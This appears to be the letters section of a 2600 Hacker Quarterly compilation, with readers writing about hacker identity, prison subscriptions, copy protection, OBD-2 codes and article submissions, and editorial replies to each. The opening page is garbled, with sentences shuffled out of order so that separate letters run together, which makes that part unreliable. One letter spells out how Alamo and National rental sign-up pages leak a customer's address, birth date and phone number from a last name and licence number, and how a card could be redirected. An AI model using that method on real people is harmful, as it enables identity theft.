“Telecom Informer” column.org and www. I have read of a dog that was electrocuted by walking onto an ice slick that was “hot” due to old. and I was delighted to see the sentence. Your statement that nothing can be done legally is untrue.com. “And so it goes” in your response.

I have subscribed to [or purchased] 2600 for years. I feel rather strongly about this. We hope it works out. It was called ID Tech.. [we have] subscribed to 2600 The Hacker Quarterly. you are buying a hacker book. At the checkout. Everyone” stickers onto the automated checkout machine. Dear 2600: In the Winter issue. you don’t need a camp to find hackers in your area. “You’re not planning on doing anything illegal are you?” So I asked. last summer was one of the greatest years. but abandoning the thinking that made most information security professionals what they are today. I stopped to pick up a copy before I had even gotten home from camp. It will open your eyes to the types of things that are possible. Dear 2600: I want to tell you how I found 2600 because I sure as hell wasn’t looking for good reading material at Barnes & Noble.D. It is a voice for people. I got the following email (edited to remove identifying information): “In the past. Dropping our subscription. I can’t afford to go any longer but on my last year I took back one last bit of great knowledge: 2600. I guess the only ones we know about are the ones who get caught. Trusty Google returned your website as the top search as well as other listings referencing 2600 directly or indirectly.” I tried to tell her it’s not about stealing credit cards and crashing computers but about freedom of information and making things more secure among other things. I think 2600 is one of the best information security publications available and we should keep up the subscription.” To which I responded: “Please do not unsubscribe from 2600 .VOLUME 26
to buy the book.. I have now learned the story of John Draper by heart and am a subscriber to your magazine. Sadly. there is a tech camp that I used to go to every year and it really has shaped a lot of who I am. they already block 2600. people. Dear 2600: I did a Google search to find your website and check the release date of the next issue. after she handed me the book she looked at me.” That’s when I told her how hackers get a bad rap and what you see in the media is not accurate. every spare moment I’d bug him so I could read it some more until I had read every word in it. I hope the company I work for will not unsubscribe from 2600. uncertainty.” Obviously.The Hacker Quarterly. Well anyway. “Hacker” initially meant someone who explores and tries to understand technology. both from the camp and from the kids I met there. After it was time for us to all go home. and said. George It’s funny to even think of this as a vulnerability when it’s such an obvious area of concern for any merchant. and doubt. as opposed to many information security magazines today which often seem to be only voices for corporations looking to hawk their wares using fear. From then on. Yimir submitted an article about using an automated checkout to get beer if you are underaged. Every person involved with information security and information risk management should read it. “What gave you that idea?” to which she responded “Well. One day when we walked in. I loved it there and I learned a lot. 2600 promotes and encourages people to actually think. we were all sitting in the chairs with wheels crowded around the laptop when my friend showed me this magazine that I had never heard of. usually by self-directed education. and then asked. IMHO. and processes. I loved going to a camp full of hackers my own age. I wonder if this vulnerability has been noticed elsewhere. repeated the title with some skepticism. research. given the important job we ask our information security professionals? Please do not unsubscribe from 2600 . 2600 started long before the media got its hooks into the word “hacker” and turned it into the bad label it is today. “Yes Ma’am. Then she replied. I went to Tops (my neighborhood supermarket) the other day and noticed that they had changed their checkout system and it will have you wait for an employee to come get identification from you. Thanks for printing a great book and fantastic magazine! Andrew Dear 2600: Recently. and that’s bad enough!
Rman665+1 Thanks for speaking up for us. My roommate and I would always go to a friend’s room to watch Red Dwarf way past “lights out” every night. Fortunately though.THE HACKER DIGEST . “You be sure to stay out of trouble!” I smiled and replied. and experiments.” I guess it always has been and always will be up to us to change the perception of hackers to the common person. “Well. (Previously the system was vulnerable to the trick in the last issue. Ampix0 We just hope it’s not because you spontaneously bought all of our back issues and t-shirts that you no longer have the money to go to camp. In New York. com. I became close friends with a few other kids during the weeks we were there. Can we afford that. smiled. I was greeted by a sales clerk who looked at the book. would be the equivalent of saving $24 per year.) They also slapped some new “We I. What fascinated me was that the fourth search result returned by Google was the link for the Democratic People’s Repub-
222
. and why the hacker ethos is important.The Hacker Quarterly. However. I would like to know whether you feel this publication is valuable enough to continue subscribing to or not.

and a book on my website: http//www.” I look down at the glossy flyer with the corporate logo I faintly recall from all the bulletin boards around the joint. Now. Here. You can always stick a password onto your router so that only people you know can use your connection. It basically comes down to what we believe is right and wrong. but I was wondering if you would care to draw out and expand on when one is contributing to security in general.html. Dear 2600: I would like to inform your readers of something I just found myself involved in. and when one is just stealing or throwing bricks through windows. it’s seen as okay. And yet. I recently got a letter in the mail informing me that I was downloading games illegally and I should stop before my Internet service is canceled and I am prosecuted. subspacefield.org/security. when it comes to bypassing access controls on programs. then it becomes
Remarks
223
. or pre-generating all valid SSH keys for Debian systems with the OpenSSL PRNG vulnerability. after all. Peter Wrenshall We’re happy to be of service in the furthering of hacker-related literature. as well as many very technical ones.jpay. I think it’s cool that a Google search for 2600 returns 2600-related items as well as something like North Korea’s website.org/ security/security_concepts. there was a time when you could hit cancel on gasoline pumps after pumping your gas and not be charged. Dear 2600: I just picked up this quarter’s issue. The point of the story is I’m no hacker.com Anonymous This is an interesting site that allows you to do all sorts of things from transferring money to making restitution to sending letters to inmates. It has motivated me to start writing a new novel. They can use my wireless without having access to my personal pics or the computers on my network. so to speak. there seems to be a different prevailing attitude. There once was a time when I thought that was “fair play. Travis H. and says “here you go. digital same day deposits.. I real on. if it can be done. My cellmate happens to be unintentionally computer illiterate and he asked me. Doing so is not proving anything about the security.. We’d also like to hear if this site is helping prisoners or taking advantage of them. “Serving over one million inmates.subspacefield. we all know about the brick vulnerability. in my free “Security Concepts” book: http://www.VOLUME 26
lic of Korea.. and just recently became a lifetime subscriber. smiles. Simple money transfer alternatives. My Internet was set up to have an access point for people to use when they come over to hang out. and they left a hole in the security of the system to anyone who was just pushing their buttons. Finally. We encourage aspiring writers to send their work to articles@2600. Anyway. “I wonder if someone could hack in and put money on my account. I’m sure there are some people reading your magazine that are hacking or ripping games to their CPU using BitTorrent or some kind of p2p program. I’d like to invite your readers to come and take a look at the security articles. we are rather curious to know more about them. Just be aware: Big Brother is Watching You! Greg C. Dear 2600: So I am sitting in my cell the other day reading the latest issue (26:1) and in walks the unit counselor. We do have some more hacker fiction submitted by our readers for future issues. so many thanks. I found myself a bit confused by your reaction to certain events. Dear 2600: I’ve been a reader of your magazine for years. we have yet to hear of them. playing a game by the rules of the people who programmed the pump. When I started reading your magazine. if you’re being held captive by a lunatic and you do this to escape. since this is the only company in town. I deal with some non-technical issues like this. presentations.. in certain cases. For example.com actually signed their threat with PGP.” I wonder. It became obvious that someone in my neighborhood is using my wireless to download games. I’d be willing to bet many of your readers do not know where to draw boundaries. Social or technological vulnerabilities? What are we being exposed to here? Will the Jpay logo one day be the header of my parole papers? www. your reaction (and mine) is that this is just stealing. Similarly. If there are vulnerabilities. or retrieving encryption keys from DVDs. and would like to thank you for publishing my short story.. so to speak. carlos This no longer seems to be happening although we also noticed it at the time. just walk in to any participating Wal-Mart (read: Sam Walton Correctional facility grand opening soon!). Few could say that throwing a brick through a window is a constructive act. we all know that untempered glass windows have a brick vulnerability: throw the brick at the window and it goes through. He looks at me. I’m playing Devil’s Advocate here. although I love to learn about it and read about it. We wonder how many people wound up having their lives somehow altered by that.THE HACKER DIGEST . However. So.com. In particular. I soon learned what a mistake that can be. something exactly the opposite of what 2600 stands for. All that is allowed is access to the wireless web. The letter you received is extremely common.” You were. We thought it was interesting that the folks at copyright-compliance.” Huh!? More confused or intrigued than sold.

as well as prevents me from fixing my own cars. anybody who is able can make a “pass-through” device that can plug into any OBD 2 car.” This will mandate that all auto makers provide free access (public access) to all their codes and registry information for all their cars. so they can put it on whatever device they want. Dear 2600: Feel free to use the search on my 2600 index at http://2600.wrepp. However. you pay more and get less than you would buying the song on a CD. again it boils down to right and wrong. actions that defeat this mentality are by default a positive thing. these poor people are trying to do the right thing and buy this stuff legitimately. not the least of which is flashing the e-prom with an “updated” program that makes it get worse performance and worse gas mileage (all in the name of emissions standards). yet they get punished for this? The first company that gets a deal with the popular artists that allows them to sell people good quality unprotected music. Jeff Dear 2600: I’d like to request you include in your magazine a challenge for everyone to consider: Cracking the codes for the automotive OBD 2 proprietary data set. In essence. It’s a pretty sick joke. Dear 2600: I would say that the music CD is pretty much dead. However. Anyway. will be what truly kills the CD.org. That cuts out the “little guy” like me from being able to afford the diagnostic tools. The recording and entertainment industries have gotten such a bad reputation for their actions that almost anything people do in opposition to their policies is now thought of as a good thing. For 99 cents. Epp Thanks for doing this . I thought this was pretty classy. They run Trend Micro for their browsing security. William R. part.” Years ago. even when in other situations those same actions would be seen as bad. and auto design manufacturers so that only they (and nobody else) can produce and sell tools and parts to fix the cars. and yet it costs more to even buy the stupid thing? For crying out loud. obviously. Dear 2600: I found it quite interesting that recently they have classified your website as “Dangerous. you pay for your own blank CD (assuming you even put it on a CD). Chris H It’s amazing to see how consumers are taken advantage of in such a manner and how they’re the ones seen as being in the wrong if they defy these “rules. then we can begin to work together to put some simple and inexpensive tools in the market to fix our cars.
224
. but with online music priced like this. I’ve got a ways to go but it’s getting there. the dealer has proven time and again that it is unreliable. such a thing would have been unthinkable.com/. Verified fraud page or threat source” here at my job for the State of Texas. More info on the bill you discussed can be found at http://www. I figure that if the smart guys out there can crack these codes. here are a couple more examples of how industry is pushing individuals to break their rules.righttorepair. In the meantime. The reason I am bringing this to your attention is because the auto makers have formed a monopoly and cartel with certain tool. Telling consumers that they’re not allowed to use the DVDs they bought on certain machines or expecting people to pay twice for the same thing is generally thought of as wrong. since it involves a degree of ingenuity as well as the joy of being the first to come up with it. unprotected format that doesn’t make them sign a license agreement for every song they download. where’s the point in having copy protection on music files that you let people burn onto an audio CD that has absolutely no copyprotection? I think this 99 cents per song deal may be partially thanks to Apple. stealing and not a constructive act (unless you’re being held captive by a lunatic inside of a gas station and you do this to get enough gas to escape).VOLUME 26
a positive action.it will prove a valuable asset to many when complete. restricted version of the same song as you would get on a CD. this plan has been in the works for many years now. That’s why it’s important to always reflect on the why and we’re glad to see you doing this. Figuring out how to bypass a gas pump is a triumph of sorts. I even sent them an email asking for an explanation of the categorization and have never gotten a response. for a reasonable price (less than 50 cents a song). in a popular standard lossless format. But actually using this method to get gas for free is. I am being prevented from owning and taking care of my own property. and that it even breaks my car in various ways. I am being forced to send it to the dealer to fix it. you get a copy protected. Thanks for entertaining my challenge. Insofar as bypassing access controls. Therefore. Why do they give so many government grants to the electricity producers who pollute the air and water with mercury and aren’t held accountable to high emissions standards? I hear through the grapevine that some small tool makers are trying to lobby Congress to get a law passed called “the right to repair act. There’s a definite danger here since people can easily get used to doing the wrong things for the right reasons and then eventually just forgetting about the reasons altogether. with no response or effect. and putting it in a usable format for everyone to use. That way.THE HACKER DIGEST . and download the information to their computer for analysis. The problem is that the music industry just can’t seem to accept this and realize that people want online music sales done in a standard.

all from their database. since a new search on the search page at alamo. address. To tell you the truth. Their perspective. This is the root of so many of the security problems we face today. date of birth. too. and date of birth. National’s page asks only for name and license number. National’s website does require a credit card number for a $1 authorization verification. I’m a person who lives in silence. This also opens the companies’ customer databases to the possibility of serious corruption. “The information!” There was something different this time. It smelled fresh from the printers. this is just another example of how virtually nonexistent strong privacy laws are in the United States. this feature did allow me to overwrite the information that these companies had about me and therefore protect my information and privacy to some degree. it pre-fills the registration form with name. I am writing a truth. Once in possession of the Emerald card. date of birth. 2600 is not the respected and feared organization anymore. Customer support at these companies say that there is no way to remove any customer information from their databases or to make them not searchable on the website. We need legislators to pass strong privacy protections similar to the laws in other countries. an organization once respected and even feared.com with the “old” last name and license number then returns no matches. but will return a match with only a correct last name and license number. license number. just love. the site will pull the correct date of birth from the customer database and populate the field with this information. This message. On the upside.) Dear 2600: Alamo and National Rental Car companies allow customers to sign up for their frequent renter programs at their websites: alamo.not from hackers but from companies that don’t take their customers’ personal information seriously enough to protect it sufficiently from all sorts of prying eyes. Like pages gathered in a book I realized what the black hat hackers and the respected security professionals told me was slowly becoming truth. phone number. a joke. but my own situation is not one to be trifled with. Then I realized something. since with only a last name and license number. and much love your way. even if you search with an incorrect date of birth and incorrect first name. If a customer has rented before. this distress call. is now. date of birth. but it does not use AVS (address verification system) to authenticate the billing house number and zip. writing this letter is taking a risk on my part. Anyways.VOLUME 26
Thanks. I became humored with the objectives of hacking. A reason and a need to truly change. Unfortunately. since all of the information in the pre-filled registration fields can be changed. anyone can obtain the address. they could then make reservations under the customer’s name. (Candy not included in letter. Reading the magazine disappointed me. there is always a chuckle at the end of the sentence. Now. and frequent flyer numbers which have been previously used by the customer. “Hacking Beer” and “Hacking Thy Self”? I had a good laugh for a moment. National Car allows the customer to sign up for the “Emerald Club” program with this form. the risk is nothing for what I’m about to share with you. and driver’s license number. The ink gave a new shine and the paper felt brand new. Something odd. I found myself already knowing the information. is to all who read this. Obviously.THE HACKER DIGEST . Dear 2600: The reason I’m writing this letter is because what was once a well renowned hacker organization. “Finally!” I said to myself. I grew excited just holding it in my hands. I always try to comprehend the way others think when describing their point of view of the world. This apparently updates the companies’ main databases. they can search by name and driver’s license number to find their record. This isn’t the same 2600 I once knew. Walking through Borders last week.com and nationalcar. With Alamo. to many in the black hat and security world. I had to give in to my temptation and purchase the magazine. none none Thanks for so clearly pointing out where the true threat to our privacy lies . I’m writing this not to offend or “hate on” 2600. Not much for me to glean from. and then submitted. this is a huge security flaw. For the past year I have held back from buying a 2600 magazine. curious people asked what it was. Who I am? What gives me a right to say such
225
. but will also return a match with only a correct last name and license number. Upon reading the 2600 winter edition. When buying a magazine. which means that an identity thief could sign up and change only the address to which the Emerald card would be mailed. I’m too close to joining Club Fed. upon mentioning 2600.) Sean What in the world is a “verified fraud page” and to whom do we sent our retort? (We can handle being thought of as dangerous or a threat source but “fraud” just rubs us the wrong way. As I kept reading.com. which stipulate that companies can only maintain information as long as is necessary to provide the service for which it was originally collected. There was a time when. when talking about 2600. what they were hacking. Candy. always use precaution. phone number. When I started to read the first pages. Call me paranoid. Once a match is found. license number. and frequent flyer numbers of a customer that has ever rented from one of these companies. but a search with the “new” information returns a statement that the customer is already registered. A person who watches. Alamo’s search page asks for name.

cyberpunks. for someone else just coming into the scene today. I relate hacking to fire. and many others. If it weren’t for my friends that I had met at 2600. maybe things you’re not interested in. The people you once knew are likely not there as they’ve moved on to other things. and fire is even to be enjoyed. I am writing to you. I know what a real 2600 meeting is. It’s a gift. I attended 2600 meetings at their source. I understand technology and programming fully now. I’m a respected black hat hacker. though. What we find more often than not is that the real change takes place in people who read the magazine.” The diversity in our attendees and
226
. there’s no reason for all the cloak and dagger techniques to keep your identity from us. found their niche in life.VOLUME 26
things? I will educate you a bit of who I am so much so as not to overeducate you to the point of exploitation. Readers gain more technical knowledge as they grow.again. Hacking is an art. and n00bs. First time attending the meetings I knew I found a place that flowed with neverending fountains of information. we wouldn’t be a lot of things if it weren’t for 2600. We can take (and we welcome) criticism such as this. it’s a gift to know how to wield it. But it’s also possible for interests to change. But we know that isn’t always possible. not taken serious by its own attendees. this kind of knowledge is just as exciting. If you didn’t notice. What used to be the domain of relatively few people has turned into the playground for millions. “Why is 2600 so deserted?” My answer is they tore each other apart. not in this community nor any other. saying: “2600 Magazine has gotten too commercial. What happened? What happened to the hacker haven everyone in the world runs to? The 2600 meetings were a place where I. All of this changes perspectives. but what are we doing about it? Anonymous First off. Similarly. I know what a real 2600 magazine looks like. and n00bs. our conferences are anything but “script kiddies. That is why today I write this letter to the readers of 2600. We do need to set you straight on a couple of things. I enjoyed the information. Our first letter accusing us of losing our way came in 1985. This is nothing new. I remembered being invited to dumpster diving. The attendance at the meetings easily made 50 to 90 people. I know there will always be such comments and jokes. Fire also needs to be taken seriously. to make a change. We don’t know what meeting you attended in New York City that had less than ten people but we can tell you it most certainly wasn’t one of ours. Attending HOPE was an eye-opener. This organization changed my life. creating electronic devices from scratch. rebellion. one year after we started. all wrapped up in openness - that is what defines the hacker world for us. We need to take it seriously.” Yes. You seem to be exaggerating on both ends to suit your disenchantment. The very nature of what we talk about here is a deep connection to the kind of change that makes the technology we used a decade ago an antique today. I find myself setting up servers with three operating systems. Today. A more realistic hope is that whatever period of time people do spend with us is remembered as constructive and perhaps even formative. It’s all a part of life. It freaks us out too. I met friends that till this day I trust my life with. Their own cliques. Their own drama. 2600 isn’t what it once was. No. Of course. It was our home. The day came when I returned to visit my oasis. “Why?” I kept asking myself. I wouldn’t be here amongst the living. I moved and could not attend my 2600 meetings. but still it wasn’t enough to satisfy me. cyberpunks. And their fresh perspective of it is what makes more of the magic happen. However. But does it change our spirit? That spirit of inquisitiveness. Things have certainly changed on every level imaginable. This is the path that lots of people go down because it’s a progression from one part of life to another. It’s possible to remain a part of this audience while also changing who you are. I found something I did not expect: solitude. Wired made its own joke of 2600 in the April 2008 edition (page 42). People turn from rebellious kids to people with jobs and then to parents of their own rebellious kids. something the rest of us may have forgotten. Not taken seriously by the electronic community. There is so much more to play with now than there was in the past and it’s no longer essential for hackers to break the rules just to get access. after hacker parties. So all of that changes the dynamic without a doubt. We would love for our readers to always be with us. New York City. and late night hacks. It’s to be enjoyed and taken seriously. This place was Hackerdom to me. I accomplished my goal to attend and I accomplished my goal to learn more about computers and systems before attending HOPE. As a magazine. we have to keep our focus on our unique type of audience. This organization helped me beyond what I deserved. Hacking needs to be taken seriously. Yes. Ten people attended.THE HACKER DIGEST . But the people who are there now are every bit as enthusiastic about what they’re into . and creativity. 2600 is barren. All this wouldn’t have been possible without 2600. One sure way to lose touch with this would be to close the door on the inexperienced and get caught up in a world of jargon and name dropping as we make more and more connections. millions. Today. Too many people call 2600 and HOPE conventions a group of script kiddies. We’ve heard that the hacker world isn’t what it used to be since well before then. What seemed totally amazing to you five years ago is nothing new today. a loyal hacker to 2600. It’s a gift to possess fire. maybe less. We also don’t recall ever having as many as 90 people show up.

I am very enthusiastic when it comes to this line of education. Thank you for making my time worthwhile and educational. like being able to type this letter instead of writing it. Louie Ludwig Thanks for the music and the kind words. that prove the point? Subliminal seduction has existed for ages. I encourage hackers to go after the gambling boats and casinos and try and get their files on subliminals. the potential is always there for people to change the focus and steer the discussion . we’re supposed to be upset that Wired thinks we’re too commercial? We can only assume that was an exercise in sarcasm. I have three more to go after 25:4 until I should be getting released. I read your magazine and I will be sending for a subscription soon. Have some more songs. while rereading some old issues.5 WBAI. just that the subject matter be written from a hacker perspective and be of interest to our audience. This might be best since some institutions only allow printed matter direct from publishers. but in this period of time where everybody is recording everything.com. rather than simply saying these things exist. Finally. etc.com. or barnesandnoble. Let the hackers save millions from being hooked on gambling through subliminals. Dear 2600: Right before Christmas I went into a bookstore and saw several small magazines in front of the larger magazines. as such. and want to submit. Thank you for that. Not every single boat and casino will be using subliminals. P. How about some recordings. The conferences bring these people from different backgrounds together and this is one of the achievements we didn’t have in our early years. It’s cool to see how far 2600 and the hacker community in general have come.com/. Where can I send for my copy of The Best of 2600? What is the cost and the shipping? Keep up the good work and future success. What an awesome book. to hook millions on gambling. Dear 2600: I’m currently incarcerated but had the privilege to have The Best of 2600: A Hacker Odyssey sent to me. I want to give you my address for any return subscription or t-shirt you may wish to send me. Although I’ve only been gone a little over seven months. it’s a lot harder to get away with it. But a lot of them are and they’re spending millions doing it. I am sending you a copy of a letter I wrote to my small town newspaper. How long does the article have to be? Can I get a copy of an example article? Michael W. The next day when I went back to the store. Good luck.S.both online and face-to-face. We appreciate your writing and believe it’s good to always do some self-examination. I am also prison self-taught in computer technology/repair/troubleshooting/hacking and programming.THE HACKER DIGEST . The gambling boats and casinos nationwide are using subliminals in their music. com. I’m a long time reader and will continue to be until no longer possible. The reason for this letter is for the benefit of myself and others in my situation who use snail mail in ordering books and supplies from prison.” I bought one. When I looked through one and saw “hacker. video or audio. Mississippi refused to print my letter because they are protecting the gambling boats there. Before coming here. We exist as a voice for many parts of the hacker community and. The calm. Is it safe to send you my address information? Will it be de-
Submissions
227
. since we don’t sell the book ourselves. I enjoy reading your back issues as well as your quarterly publications and I admire the radio show Off The Hook every Wednesday from 7-8 pm on 99. is to have someone on the outside buy it online from a site like amazon.VOLUME 26
speakers is nothing short of staggering. You could also buy direct from the publisher at wiley. I’m now counting down my time by 2600 mags. We encourage people to check out your site at http://loulost. as is the range of technical and non-technical knowledge. Dear 2600: Recently. Thanks a lot guys and good luck in the years to come. There is no set rule or format. I’ve missed so much because of how fast things advance these days. I didn’t realize how much I took for granted until everything had been taken away. If you’re reading this or any other issue. Dear 2600: I am interested in writing an article for 2600. A lot of television stations are also doing this. the other magazines were gone.just by speaking up. Ph1UK3r_TIH Probably the easiest way. dry response to letters sent you have taught me invaluable lessons about civil discourse and respectful dispute that have informed and improved my communications . but I am worried that my identity would be compromised with the government. borders. Chris Dear 2600: I am a Temporary Incarcerated Hacker (TIH). you have plenty of sample articles to look at.com and have it shipped to your address. The Vicksburg Evening Post in Vicksburg. I realized the most important thing I’ve learned from your magazine. Dear 2600: I have a full length article I wrote. I wish the hackers happy hunting in the name of freedom. John Cartwright We don’t doubt such things are going on but your argument would be a lot more likely to be accepted with some actual evidence. Pretty much I just wanted to thank you for having such a great zine to offer the hacker community all these years and still hanging in there when times got tough. Even little things.

Since then. So any article that helps to do that would be seriously considered. or should I just wait until then to submit it? Toby It depends on how soon the date is. SIGC. they are by no means the only type of article we print. I’d like it to be out of pure lack of quality or interest.” I think it’s important to consider the first line of security in any situation: the person with the codes. So would a rewritten article with some new information be worth sending in given the previous blog post on the subject? If you guys decide not to publish something I sent in. Not only does that person carry passwords. keys. I actually wrote a blog post about this last year. and. Now. Your article should be as long as you deem necessary to get your points out. 2600 is definitely a different audience than. Dear 2600: If I submit an article that I want published only after a certain date. Dear 2600: I’ve been fortunate to have the time recently to publish conference papers on a project that I started at my local university (free Linux computers . and every year we conduct voting online. but that’s not really the point of this letter. it could get even more dangerous. depending on our backlog and its timeliness. I was interested in writing an article for your magazine. Last year. (You probably could. it’s just a Free Geek under a different name). Having grown up on 2600 and the values of exploration and social responsibility. technical. To assume that you’re constantly being monitored. although I do think that it is very important to remember the ultimate purpose of self defense: to escape and survive. as that is something that needs to be practiced. not because of some technicality. We suggest you take precautions to protect your privacy but don’t be afraid to speak up for fear of persecution. there are all sorts of ways information can be intercepted. It can take anywhere from a month to a year for an article to make its way into our pages. Standing up to that fear is where the real progress is made. I would rewrite the whole thing to better fit with the magazine.VOLUME 26
stroyed and kept out of “Big Brother’s” hands? How should I go about getting this to you? Mack All we can do is tell you that we’re not going to give your info to anyone. I decided to look into how secure this really was. any suggested length for a long article? 3) LaTeX fine? Collin While technical articles have always been welcome here. Of course. being a hacker. I am asking beforehand for a couple of reasons: 1) Is this out of place when so much of 2600 is code and hard tech? 2) I can write forever. I also will not be talking about techniques. but that’s not the point. with the advent of implantable RFID devices. will probably be more of a burden on your freedom than any actual monitoring that is going on.THE HACKER DIGEST . we’ll be happy to consider it for inclusion in our pages. late December of 2012 or something. I was hoping to be a little more direct. If it’s something you don’t want us to release until. but they probably have access cards. can/will you honor that.) Tyler As long as the article isn’t simply a rehash or reprint of something that’s already out there. our readers prefer to get material that they haven’t already read. I took a tangent and started exploring the sociological aspects of Linux adoption and development (and why the impediments to Linux are largely psychological or intrinsic to F/OSS). The rest is all a bunch of fluff. we prefer ASCII to avoid any weird format incompatibilities. Dear 2600: Due to the fact that items of security verification are generally kept on the person. but it’s worth saying again because you really can’t be thanked enough. then you might be best off waiting until that date gets a little closer so that we don’t lose track of it. Are y’all interested? James Kern While we don’t dismiss any idea outright. say. I know just about everyone says that. I don’t necessarily support any one school of thinking on the subject. both online and off. It may be more efficient for someone go after a person in some cases than to go after the system itself for one-time entry. Dear 2600: I’m in high school. and honest by putting it in your quarterly. As for format. I was hoping that and honored if your publication would be interested. however. and background checks are done on many occasions before hiring. and if I were to send something in. say. Thanks again for everything you do on the magazine. During a presentation on the matter. since then I’ve actually gained a bit more information on the attack. while we can read most anything. I’ve been pondering the avenues to write about it. other than the friendly people at the post office when we hand them your package. this seems as if it might be veering away quite a bit
228
. but there seems to be less information on how to avoid social engineering and physical attacks. As you well know. Tiger teams test the security of networks and computer systems. locking systems are thoroughly considered. but one of your restrictions is that it needs to be unpublished. I was wondering if y’all might be interested in an article on the concept of self defense. actually.essentially. it was horribly insecure. Obviously. Our purpose is to open minds and encourage exploration and disclosure. In the spirit of “the best security system is only as good as its weakest link. so this might not even be an issue for you.

if you think you can write this in a way that would be specifically of interest to hackers. similar to many other countries. people can have all sorts of things on their person and perhaps an article on imaginative places in your body to hide access cards or which USB devices can be safely swallowed might be enlightening. Gasoline is a petroleum product which is made by a process of fractional distillation. Enough foolish investors bought in that it attracted the attention of the Securities Exchange Commission and became known as the “bathroom caper. COP) will not have much correlation with the price of gasoline (or its seasonal fluctuations). where the tactic is engaged in by short sellers desperate to cover their positions so they don’t get wiped out. so you might want to take it out. Nice try. is so broad that we could publish books on the subject without ever crossing over into the hacker realm. They want to log all the Internet activities. A php script was used to change a story and get ahold of our encrypted password file.you can’t store it until next winter. it had been removed. This may be a form of securities fraud.” (from http:// en. Yes. Our site was hacked to an extent. That said. all the hacker groups promote TOR. Moreover.) The price of gasoline has no direct relationship to the price of the shares of oil companies. traders could take on large short positions themselves. I just thought you should know it’s still in your published RSS today. the gasoline prices will lag shortly behind. where a trader (or group of traders) attempts to force down the price of a stock to cover a short position. Finally.with notes written to buy large blocks of shares. Dear 2600: OSIN asked in his article “the torminator” why so many TOR nodes are located in Germany. These people trade the stock amongst themselves to bid the price up. Alternatively. Freeradical oxidation causes the gasoline to polymerize over time with exposure to oxygen in the air. The target stock would be circled in red pen . no cigar. so you can figure that the price of the common stock of the refiner (XOM. we’re now working on overhauling the site entirely and this has actually got-
Responses
229
. When the price of oil increases or decreases. or even between the price of West Texas Intermediate crude oil and the price of gasoline. Crude oil is a starting material. however. The price of an oil company’s stock is reflected by the profitability and net assets of the company in present and future terms. which involves other processes as well. and you get the sticky gunk. What you pay at the pump is for oil that has been refined into gasoline. and one for summer and hot weather. The same goes for summer formulation gasoline. For a group of investors to manipulate the price of a major oil company is impossible due to the great number of shares traded daily. This means that all of the gasoline made for winter has to be used up by the time winter is over .” This is actually a common practice in today’s equities markets. because the engine may run for a while and then quit. we have to admit it. The price of commodities is pretty much determined by supply and demand. which puts downward pressure on the share price. You’ll find this out if you leave gasoline in your lawn mower in the fall and try to start it up in the spring. Florian Dear 2600: Unfortunately Isreal is not real on this article. Thanks to them. go for it. Brad Yes.” “A bear raid is a type of stock market strategy. one for winter and cold weather. gasoline is usually made in two formulations. However. It was sloppiness on our part and we want to thank the people who did this for not causing more mayhem than was necessary to wake us up. (I fear you are presently rolling your eyes at reading the said pun for the millionth time. When I clicked to go directly to the article. Hudson Dear 2600: I saw a news post in your RSS feed titled “Go Hack Tetris!” I’m not sure. with the large volume of selling causing the price to fall. The overall concept of self defense.nice and bold .wikipedia.THE HACKER DIGEST .VOLUME 26
from what we discuss here. As a result of that. One successful method discovered in the late 1980s was the leaving of newspaper stock listings in washrooms of the stock exchanges and brokerage houses. I guess that is because of the new antiterror movements of the government. This can be done by spreading negative rumors about the target firm. Another name for this is “bear raid. gasoline is a perishable product which will go bad over the course of about six months. at least in large quantities.org/wiki/Bear_raid) In the last few sentences of this article. not the final product. What our friend Isreal is confused with is that small companies with “penny stock” (shares that sell for under a dollar) can be. and at times are. making the strategy self perpetuating. manipulated by people. you’ll find that the insides of the cylinders are coated with a really sticky varnish-like material. there may be a tenuous connection between XOM’s or COP’s stock price and the price of gasoline. but it looked like perhaps somebody broke into the site and posted details to it. and when you end up rebuilding the engine.” Sonny Dear 2600: The article by Isreal purports to give a strategy for driving down the price of a stock by faking “insider information. They also send out various rumors by several methods. the author alleges that this would be a good scheme for driving down the price of gasoline.

but I’m a First Amendment kind of person. of course (who does?). too. with different OSs. My first PC was a 286 running DOS 5 with Norton Commander to organize the 20 MB hard drive. I had a key to the building so I could do repairs and upgrades when the library was closed at night. but I tend to concentrate more on building websites and learning some programming now. and I quit.” and does not relate to the verb. on my old Trash 80. too late). I once had a network in the bedroom with seven computers. I eventually developed my skills and knowledge to the point that I became the head of IT and network admin of our public library. which was still working when the next upgrade came three years later. this was a great place to talk to people selling their old stuff and to learn how it worked.11 on it when Windows 95 was still all the rage.S.. “of those people. That was pathetically easy and actually kinda boring. realized that personal computers weren’t a fad. I finally bought a brand new PC with Windows 3. I picked up an old 386 mobo out of a dollar box. and this is my first letter. Mostly. I’m happy as hell.VOLUME 26
ten people communicating about positive changes. However. I may be an old white hair. I bought Red Hat 5 when 10 was already out. I bought tons of books and more crap (as my husband called it) and soon had an entire room full of pieces-n-parts. Great mag. I made the brackets and drilled holes and force-fit the system. thrill me. I still love DOS. But perhaps the biggest reason I haven’t written till now. they just want someone to fix their fuck-ups immediately so they can get back to email and downloading recipes. I never hurt anyone or messed with anything that would.4 wireless antennas. and bought everything that looked interesting. But I couldn’t deal with ignorant users. the freedom to hack was a delirious and delicious time in my life. I don’t agree with all the article authors and letter writers. we would have survived since we do take precautions and make frequent backups. and did my first upgrade to another 286 I’d gotten by now.. (Sorry. So I decided to dive in. They don’t want to learn what they did wrong.. but I’m a picky ol’ thing who learned proper English when public schools were still teaching it. still in the unopened box. So. though it’s obvious that hasn’t stopped others from writing anyway... like the time the new director ordered all new PCs without consulting me. to make a long story short (oops. too). but I needed to learn from whatever beginnings I could find. I became the go-to gal in my area when home users needed help. and we switched to software security.” The subject of the sentence is “one” and that means the verb (read) should be singular (reads). but those days are gone.) Granny
230
